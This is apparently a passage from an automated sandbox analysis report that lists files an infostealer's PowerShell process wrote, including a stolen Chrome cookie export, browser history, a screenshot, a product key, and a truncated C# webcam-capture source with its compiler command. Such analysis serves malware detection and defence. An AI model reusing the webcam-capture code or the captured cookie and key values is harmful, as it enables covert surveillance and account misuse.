                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vnego4zw.r1s.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xm3a5dwt.fla.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_znu5b3yu.qat.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\autofill.json

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):4
                                        Entropy (8bit):1.5
                                        Encrypted:false
                                        SSDEEP:3:s:s
                                        MD5:37A6259CC0C1DAE299A7866489DFF0BD
                                        SHA1:2BE88CA4242C76E8253AC62474851065032D6833
                                        SHA-256:74234E98AFE7498FB5DAF1F36AC2D78ACC339464F950703B8C019892F982B90B
                                        SHA-512:04F8FF2682604862E405BF88DE102ED7710AC45C1205957625E4EE3E5F5A2241E453614ACC451345B91BAFC88F38804019C7492444595674E94E8CF4BE53817F
                                        Malicious:false
                                        Preview:null

                                        C:\Users\user\AppData\Local\Temp\cards.json

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):4
                                        Entropy (8bit):1.5
                                        Encrypted:false
                                        SSDEEP:3:s:s
                                        MD5:37A6259CC0C1DAE299A7866489DFF0BD
                                        SHA1:2BE88CA4242C76E8253AC62474851065032D6833
                                        SHA-256:74234E98AFE7498FB5DAF1F36AC2D78ACC339464F950703B8C019892F982B90B
                                        SHA-512:04F8FF2682604862E405BF88DE102ED7710AC45C1205957625E4EE3E5F5A2241E453614ACC451345B91BAFC88F38804019C7492444595674E94E8CF4BE53817F
                                        Malicious:false
                                        Preview:null

                                        C:\Users\user\AppData\Local\Temp\cookies_netscape_Chrome.txt

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with very long lines (522)
                                        Category:dropped
                                        Size (bytes):3339
                                        Entropy (8bit):5.834767109522286
                                        Encrypted:false
                                        SSDEEP:96:KMJfsoO2jFcRhFZyJz4MSzxPv3ujX8ZBXE5s5HwPG2cvsm/:Ka5mRtH3MelJ
                                        MD5:CAD1EE7D662C36A23B146601DB5B2DF4
                                        SHA1:D319B76371E526EC438A586BF8F0605362F54E2B
                                        SHA-256:76C63B91F584F1169B05181C6670E1ECE1E0855AB60BC5B9DC2B95C63BAA6656
                                        SHA-512:CAD0EF2463DA11528D78F02A49E98283A293C4EBFE621728197967DC4A4D8213B5FC951FB42633B64EDB57167658F0D6628D57A2F2F037E440A3BB8C44E25C59
                                        Malicious:false
                                        Preview:.google.com.FALSE./.TRUE.13356618603686193.NID.511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk.support.microsoft.com.TRUE./.FALSE.13340887435186329..AspNetCore.AuthProvider.True.support.microsoft.com.TRUE./signin-oidc.TRUE.13340887735359381..AspNetCore.Correlation.mdRqPJxLbpyv7vX0eK9YkTR-xwcrW3VBLE4Y3HEvxuU.N.support.microsoft.com.TRUE./signin-oidc.TRUE.13340887735359334..AspNetCore.OpenIdConnect.Nonce.CfDJ8Kiuy_B5JgFMo7PeP95NLhqwcJ8koDy5pXkfoWsb5SbbU2hVCbsH2qt9GF_OVCqFkLEwhvzeADNQOF5RSmkDfh5RqfqlOkx5QWo4Lltvwb0CvwBFD8ujlm3BAglOeGca3ZatkLMUkHB6alahUr8qJ7G_3AejtooymTWCzyO89hshJeX8Gh78kohbIw0IQY4v6LZriT4P2fGeBSMjrvqODB4H_bs2nbfsSfL7aN-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP1uXNT7Y1VSMOfm-L0RnS8.N.support.office.com.TRUE./.TRUE.13372509232238068.EXPID.8e067c40-5461-4aef-885f-2c92ce6a5474..microsoft.com.FALSE./.FALSE.13372422837017624.MC1.GUID=749eee6039c5489b9db3000c7ab3f399

                                        C:\Users\user\AppData\Local\Temp\discord.json

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):4
                                        Entropy (8bit):1.5
                                        Encrypted:false
                                        SSDEEP:3:s:s
                                        MD5:37A6259CC0C1DAE299A7866489DFF0BD
                                        SHA1:2BE88CA4242C76E8253AC62474851065032D6833
                                        SHA-256:74234E98AFE7498FB5DAF1F36AC2D78ACC339464F950703B8C019892F982B90B
                                        SHA-512:04F8FF2682604862E405BF88DE102ED7710AC45C1205957625E4EE3E5F5A2241E453614ACC451345B91BAFC88F38804019C7492444595674E94E8CF4BE53817F
                                        Malicious:false
                                        Preview:null

                                        C:\Users\user\AppData\Local\Temp\downloads.json

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):4
                                        Entropy (8bit):1.5
                                        Encrypted:false
                                        SSDEEP:3:s:s
                                        MD5:37A6259CC0C1DAE299A7866489DFF0BD
                                        SHA1:2BE88CA4242C76E8253AC62474851065032D6833
                                        SHA-256:74234E98AFE7498FB5DAF1F36AC2D78ACC339464F950703B8C019892F982B90B
                                        SHA-512:04F8FF2682604862E405BF88DE102ED7710AC45C1205957625E4EE3E5F5A2241E453614ACC451345B91BAFC88F38804019C7492444595674E94E8CF4BE53817F
                                        Malicious:false
                                        Preview:null

                                        C:\Users\user\AppData\Local\Temp\history.json

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:JSON data
                                        Category:dropped
                                        Size (bytes):1317
                                        Entropy (8bit):5.064791427060137
                                        Encrypted:false
                                        SSDEEP:24:fT1boh9wG5bpjRmZDl1mJbpjRSpDl1mMQTkboPpIbpjRVp7mJbpjOSbp7mJg:f4wGvVcDl1mfVuDl1mVhpOVVp7mfScpf
                                        MD5:4E04955DF6D1EA845ECF6B7CF64B2024
                                        SHA1:38E78DF66C2A26E2648277E1BCBD62061D60565E
                                        SHA-256:34FFE9A6D5CB18AD8D6A7D3A88817ED5338E4BA823B6A938121E19D95D56FE0A
                                        SHA-512:BD6F7EEE95CF6085E5B95B1A45AEEDDCFD4095461E2922D215C513EFD78D584F78B424DF54D9B7AA81AC3B15A10B7D7819A8477D71BD5B254D5932187A4A0B20
                                        Malicious:false
                                        Preview:[. {. "url": "https://go.microsoft.com/fwlink/?linkid=851546",. "visit_count": "2". },. {. "url": "https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016",. "visit_count": "2". },. {. "url": "https://support.microsoft.com/en-us/office/7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016\u0026ui=en-us\u0026rs=en-us\u0026ad=us",. "visit_count": "2". },. {. "url": "https://support.microsoft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016\u0026ui=en-us\u0026rs=en-us\u0026ad=us",. "visit_count": "1". },. {. "url": "https://go.microsoft.com/fwlink/?LinkId=2106243",. "visit_count": "2". },. {. "url": "https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17",. "visit_count": "2". },. {. "url": "https://support.microsoft.com/en-us/office/94ba2e0b-638e

                                        C:\Users\user\AppData\Local\Temp\hvw5rqqp\CSC90E3CD70A79D45AA9723BEFA972FDA5B.TMP

                                        Download File
                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                        File Type:MSVC .res
                                        Category:dropped
                                        Size (bytes):652
                                        Entropy (8bit):3.1224935734251362
                                        Encrypted:false
                                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry+lQkRak7YnqqNlQkWPN5Dlq5J:+RI+ycuZhNcQkRakS3QkWPNnqX
                                        MD5:CF8823FC882B2746C940064C43A4B179
                                        SHA1:3B13D278D97791FACB765544347C361A3D7EBE57
                                        SHA-256:12564B1B670AD2051C5E6A7E083C438C4E3A463C701F38D3D784C9209A1EA981
                                        SHA-512:AE3C63047D6FAF1DD5FA053CADCB46762ECC5A87FEBC0F2A1BCF109109B67C2AF1374B346666B95447E81F1559136706440F9050978F3E8C9804BB2ADE10F99E
                                        Malicious:false
                                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.v.w.5.r.q.q.p...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...h.v.w.5.r.q.q.p...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                        C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.0.cs

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:Unicode text, UTF-8 (with BOM) text
                                        Category:dropped
                                        Size (bytes):5043
                                        Entropy (8bit):4.2500942903723855
                                        Encrypted:false
                                        SSDEEP:96:JL4W84Ji4AnzvN0OpVDUNKMiNjHJ4OY492VXyNbEqbE:OqHeVRV4oMiNjHJu/VCNIr
                                        MD5:2A829317F65FEA84EB85CB2376FA9E21
                                        SHA1:2F223EA8738F9989385E93B9C8CF0E8FC5E30700
                                        SHA-256:F99C46F447010A438586651FCDF9068394926247BF7656980FEE066B2069FE8F
                                        SHA-512:A438C35327297431DF19FE50683619F78EA0245BB8D3AA7553C376C365B927747D8CB8343FC2CFB4DE884DAD4EB6166589AFC98EBA385137BB3405998838ACE0
                                        Malicious:false
                                        Preview:. using System; . using System.Collections.Generic; . using System.Text; . using System.Collections; . using System.Runtime.InteropServices; . using System.ComponentModel; . using System.Data; . using System.Drawing; . using System.Windows.Forms; . . namespace WebCamLib . { . public class Device . { . private const short WM_CAP = 0x400; . private const int WM_CAP_DRIVER_CONNECT = 0x40a; . private const int WM_CAP_DRIVER_DISCONNECT = 0x40b; . private const int WM_CAP_EDIT_COPY = 0x41e; . private const int WM_CAP_SET_PREVIEW = 0x432; . private const int WM_CAP_SET_OVERLAY = 0x433; . private const int WM_CAP_SET_PREVIEWRATE = 0x434; . private const int WM_CAP_SET_SCALE = 0x435; . private const int WS_CHILD = 0x40000000; . private const int WS_VISIBLE = 0x10000000; . . [DllImport("avicap32.dll")] . protect

                                        C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.cmdline

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (709), with no line terminators
                                        Category:dropped
                                        Size (bytes):712
                                        Entropy (8bit):5.376767381568763
                                        Encrypted:false
                                        SSDEEP:12:p37Lvkmb6KOkrk+ik9k2Lkqe1xqfz73UWZEifz7D9:V3ka6KOk9k+kqeWfdEifJ
                                        MD5:CBCB6D486302315C227266AC9EFCE036
                                        SHA1:F54E46D19DF699641A7C8C0E1C2F037472A36F5B
                                        SHA-256:BA226FD67A0E0D178B1F0310E71B3F7BD1CA4D5863808444CD204E38A753BFFC
                                        SHA-512:86254937C40402C723B7108B66D68F611510FFDA12B09D6942A43D094DBE344B54DB90EE5914A2AEE7164179516B93222DB89D0F7C1CD123B4F0A9FC0E3EB53D
                                        Malicious:true
                                        Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /out:"C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.0.cs"

                                        C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.dll

                                        Download File
                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):5632
                                        Entropy (8bit):4.173054887352793
                                        Encrypted:false
                                        SSDEEP:96:uNvaPdSdn2OlGYPdpCHkVM2oOVK6zMYm8K:uNvaFAcYPdp0kVMmVK6zMB
                                        MD5:829653988851CF5DA03C5A5DE36CBC1F
                                        SHA1:67B774D8C4D0728C9F74FA0CDFFCF89F80220699
                                        SHA-256:226AADCC71766949DEF4382068F09AB90FCAAE0A9CE24AD76833C7613EA34628
                                        SHA-512:838C37090F58D17CB7F6879CA73D9B82D05335792823ACAA9DB7828109254F631A9E26035F7B615499FDAA9FCA82A33E07727F1854206902F698E102430DB36E
                                        Malicious:false
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f...........!................>-... ...@....... ....................................@..................................,..K....@.......................`....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................ -......H.......\"..............................................................:.(......}....*..{....*"..}....*..{....*"..}....*..(....*....0...........{....(........ ...P......(....}.....{.... .....{..........(.....1[.{.... 5..........(....&.{.... 4....B......(....&.{.... 2..........(....&.{..........(....&*..0..!.........o.....o.....o.......(....(....*f.{.... ...........(....&*..{.... .....{..........(....&.{....(....&*...0..}.......r...p.do.....r...p.do.......+@....d...d(....,+.s

                                        C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.out

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (791), with CRLF, CR line terminators
                                        Category:modified
                                        Size (bytes):1212
                                        Entropy (8bit):5.434814676145086
                                        Encrypted:false
                                        SSDEEP:24:KJBId3ka6KOk9k+kqeWfdEifMKax5DqBVKVrdFAMBJTH:Ckka6Nk9k+kqeKdEuMK2DcVKdBJj
                                        MD5:8021C33E5C7C86899C0AD23408337DC2
                                        SHA1:B73A024DD3ED5B236AC7E788A15A6713B03B3532
                                        SHA-256:95CB7F6E98B122D914B1279D31C5B4A86839A204765E58EFD10AE73C7522A41E
                                        SHA-512:D58DEB75C87338B8DC5404E15AF7DAFA65B0EE1D051EE2C5200997E301193FE174E33A6E6F3342A0ADDB896432A741B56180EA0D538CE0658B4AE4E6AB4CDE9A
                                        Malicious:false
                                        Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /out:"C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, bu

                                        C:\Users\user\AppData\Local\Temp\passwords.json

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):4
                                        Entropy (8bit):1.5
                                        Encrypted:false
                                        SSDEEP:3:s:s
                                        MD5:37A6259CC0C1DAE299A7866489DFF0BD
                                        SHA1:2BE88CA4242C76E8253AC62474851065032D6833
                                        SHA-256:74234E98AFE7498FB5DAF1F36AC2D78ACC339464F950703B8C019892F982B90B
                                        SHA-512:04F8FF2682604862E405BF88DE102ED7710AC45C1205957625E4EE3E5F5A2241E453614ACC451345B91BAFC88F38804019C7492444595674E94E8CF4BE53817F
                                        Malicious:false
                                        Preview:null

                                        C:\Users\user\AppData\Local\Temp\screenshot.png

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):460481
                                        Entropy (8bit):7.914690366125357
                                        Encrypted:false
                                        SSDEEP:12288:2U9Yh2N1hYOM1/9cV2fh2e1oDB+JwTZ+z:2fh2tvGlv2f4JwTZU
                                        MD5:F4FAD593F5625BCB8B1B7B0F422F9F6E
                                        SHA1:12A472D3C5F030B6E7112576FFC34A87BE4165B5
                                        SHA-256:418D38C1AA554755277D5DA39078395F2BB98877C82A5C1C6AFC1132770921D5
                                        SHA-512:1B68B0C3A9CFF24B76EECCB1F75D5F3C9830072E53C69A5CCFC07D6568DD566825EE1DDEF0B3AEF9FE4E5A65148ADDB7A675FC850065426266A63A9EFD6F63EF
                                        Malicious:false
                                        Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w.mU....v..I.s.w..XU......X...ZQe..Rr...d.`.....lD%H.1.XGK).$.U6.$... ...c......ko.[{Z...o.c......>F.s./...l...C.;%...O{..tO..:'.{X`.t.4:.....N.y/..C....&.|..L.?M.........Wl.h.q.~ant>..91ulL.sO...yb..Y..HL.-..H........=.#.....5...k...4.C....CfO....L...?..S.yx~9....c1U....s....[.}.j........2.1..@..i.Y..#..L}.........5.?........<.E.S........E.S.Mys.....,z.`..'.Wj..u.@..3f..wd...fj..{ ...wf....+........"c.m.N.[Z........]us....j.[n....e....93..rK...a.P..%)O0f..>7V.7'...Z..S|Q.k.T._.w..}R<...i......h<...ml..o......j.....K.=......{]_-yS..3..b.t....v....zM.....'..M..RLcA>.=o....e.]B,...%/.;;].../J.tw.*...J.-!..w..Z.k.....NWe.;^...qC.l..o.{...]....;\Yu.."..vL......./..;\...........%.\.Y.s.n....c~Y..K.._.....X..;...K{n.Y.10...).].O.?..%.E.^...=..h..3e...m.[..oui5..%..t.t..b.-.n.}.>,.&.k}.^..].MZ.u..*.O...Ly._\-."]7..)O.g..[.m..S...w6...nvQ..lza.)W..Z..z.

                                        C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-05)-(UTC-5)\DomainDetects\Chrome.txt

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with CRLF, LF line terminators
                                        Category:dropped
                                        Size (bytes):162
                                        Entropy (8bit):4.2915603809489475
                                        Encrypted:false
                                        SSDEEP:3:5LSUMv2KCuWML8MG+teEM8vSXuYLLAXusLYFNXuxvRteBuVSRLIMG+teAMvXURLp:5uUMeK3WML8MG+XM8vSZ/A+sENcZXVil
                                        MD5:3A20FA0A83F3ABF05A002D9A610F0E60
                                        SHA1:2936E7B0EC05CE73AA5DA91D1964AB595DDEF026
                                        SHA-256:9A48691FF04CC5CD5919F111CBAE45B2C5B63FDA296C908F253CE9133B4B61A9
                                        SHA-512:503C316A1E19BD9482B2722B8972548D983259B3835891326BBFAC44E65F0E3FDD487905A5DF70D71E26FB5369C29554873C0CBA550FEF9923FB4F9AE3E089A1
                                        Malicious:false
                                        Preview:bing.com (1).c.bing.com (3).c1.microsoft.com (3).google.com (2).login.microsoftonline.com (2).microsoft.com (6).support.microsoft.com (7).support.office.com (1)..

                                        C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-05)-(UTC-5)\DomainDetects\Edge.txt

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2
                                        Entropy (8bit):1.0
                                        Encrypted:false
                                        SSDEEP:3:y:y
                                        MD5:81051BCC2CF1BEDF378224B0A93E2877
                                        SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                        SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                        SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                        Malicious:false
                                        Preview:..

                                        C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-05)-(UTC-5)\DomainDetects\Firefox.txt

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2
                                        Entropy (8bit):1.0
                                        Encrypted:false
                                        SSDEEP:3:y:y
                                        MD5:81051BCC2CF1BEDF378224B0A93E2877
                                        SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                        SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                        SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                        Malicious:false
                                        Preview:..

                                        C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-05)-(UTC-5)\System.txt

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, LF line terminators
                                        Category:dropped
                                        Size (bytes):31608
                                        Entropy (8bit):4.2599081563185095
                                        Encrypted:false
                                        SSDEEP:768:2ccTvVX/B1XKM8NZvAhig5g3hjhr1thghohQhShvhFhphhhghbhHhQhzhFhxh0h4:7SvVX/B1XKM8NZvAhig5g3hjhr1thghC
                                        MD5:6DE1B3CB908E146D10CD4CC58FC976E4
                                        SHA1:64A3C69D3830420764654C61084F9EA55506ED01
                                        SHA-256:9967FD5EB033A11FC88A3304C1B88C7BA792C563C70E9844A8C45DF0610BE699
                                        SHA-512:E2B71293A918AC5D49CF4F96A016D7D84CF82D6A09FC3E042AAA2741A6FBF7C63E4479E23E029D12D5149FAA68F9117433CDBCC7427C77266428E70C3C361292
                                        Malicious:false
                                        Preview:....................................................................................................................................... ............... .... ...... ............ ...... .... ... ......................... ...... ... ............... ....... ................. ...................................... ... ...........................

                                        C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-05)-(UTC-5)\productkey.txt

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):3.2135160449350533
                                        Encrypted:false
                                        SSDEEP:3:QRirkYhl8GnMG1olNlP9:QRTY4hXN9
                                        MD5:96E51190B70C10705DE824B2389733E1
                                        SHA1:260B2EC0893E7072E9AD9C6CE5755339BFA41769
                                        SHA-256:23D7CED40FB7D942C6A280A795FF42D02C7A5D5554EB3E417699419A7B067D37
                                        SHA-512:AD847349BDBEEFC480C923D217B2BBA62900C0983BCF08D5AE5AC3BED091113B1676A9D352CE2AAC3D88AA9E6ED730EFEFF86FC42F64A2373221ED9946E7C126
                                        Malicious:false
                                        Preview:..9.7.W.T.N.-.W.Y.7.D.4.-.G.8.V.3.T.-.C.H.K.P.W.-.2.G.Y.P.4.....

                                        C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-05)-(UTC-5)\screenshot.png (copy)

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):460481
                                        Entropy (8bit):7.914690366125357
                                        Encrypted:false
                                        SSDEEP:12288:2U9Yh2N1hYOM1/9cV2fh2e1oDB+JwTZ+z:2fh2tvGlv2f4JwTZU
                                        MD5:F4FAD593F5625BCB8B1B7B0F422F9F6E
                                        SHA1:12A472D3C5F030B6E7112576FFC34A87BE4165B5
                                        SHA-256:418D38C1AA554755277D5DA39078395F2BB98877C82A5C1C6AFC1132770921D5
                                        SHA-512:1B68B0C3A9CFF24B76EECCB1F75D5F3C9830072E53C69A5CCFC07D6568DD566825EE1DDEF0B3AEF9FE4E5A65148ADDB7A675FC850065426266A63A9EFD6F63EF
                                        Malicious:false
